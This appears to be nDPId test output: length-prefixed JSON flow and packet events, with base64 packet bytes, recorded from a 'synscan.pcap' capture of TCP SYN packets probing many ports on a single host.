-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTUIAADEGyjCsEAAIQA2GNIzS8n7dUoMYAAAAAGACCAA+EAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsMe8AACwG6oOsEAAIQA2GNIzSD07dUoMYAAAAAGACBAAlQQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPKgAADIG2cqsEAAIQA2GNIzSAyHdUoMYAAAAAGACDAApbgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsmokAADcGdumsEAAIQA2GNIzSSp3dUoMYAAAAAGACEADd8QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAssaoAADMGY8isEAAIQA2GNIzTgA3dU4MZAAAAAGACEACofgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAs+UUAAC8GIC2sEAAIQA2GNIzTFXzdU4MZAAAAAGACEAATEAAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1UAADcGRh2sEAAIQA2GNIzTArzdU4MZAAAAAGACEAAl0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAslw0AADIGf2WsEAAIQA2GNIzTC8ndU4MZAAAAAGACDAAgwwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsfFsAADIGmhesEAAIQA2GNIzTJxLdU4MZAAAAAGACDAAFegAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRAAADkGrmKsEAAIQA2GNIzTBGvdU4MZAAAAAGACCAAsIQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAskzsAADEGhDesEAAIQA2GNIzTARjdU4MZAAAAAGACCAAvdAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsr9IAADkGX6CsEAAIQA2GNIzTBzDdU4MZAAAAAGACCAApXAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsuXkAADkGVfmsEAAIQA2GNIzTG1jdU4MZAAAAAGACCAAVNAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsOXwAADEG3fasEAAIQA2GNIzTCd3dU4MZAAAAAGACCAAmrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsNxwAADQG3VasEAAIQA2GNIzTGPXdU4MZAAAAAGACBAAblwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVkAACwG9xmsEAAIQA2GNIzTBGPdU4MZAAAAAGACBAAwKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsDfUAACkGEX6sEAAIQA2GNIzTJcLdU4MZAAAAAGACCAAKygAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsmA4AADEGf2SsEAAIQA2GNIzTn8\/dU4MZAAAAAGACCACQvAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7UAACkG172sEAAIQA2GNIzTGrfdU4MZAAAAAGACCAAV1QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs4CAAACsGPVKsEAAIQA2GNIzTSp3dU4MZAAAAAGACEADd7gAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wMAADgGPW+sEAAIQA2GNIzTAyHdU4MZAAAAAGACBAAxawAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC8AADgGeEOsEAAIQA2GNIzTD07dU4MZAAAAAGACBAAlPgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsWfUAADoGtH2sEAAIQA2GNIzT8n7dU4MZAAAAAGACDAA6DQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACYG5wysEAAIQA2GNIzTC+zdU4MZAAAAAGACDAAgoAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 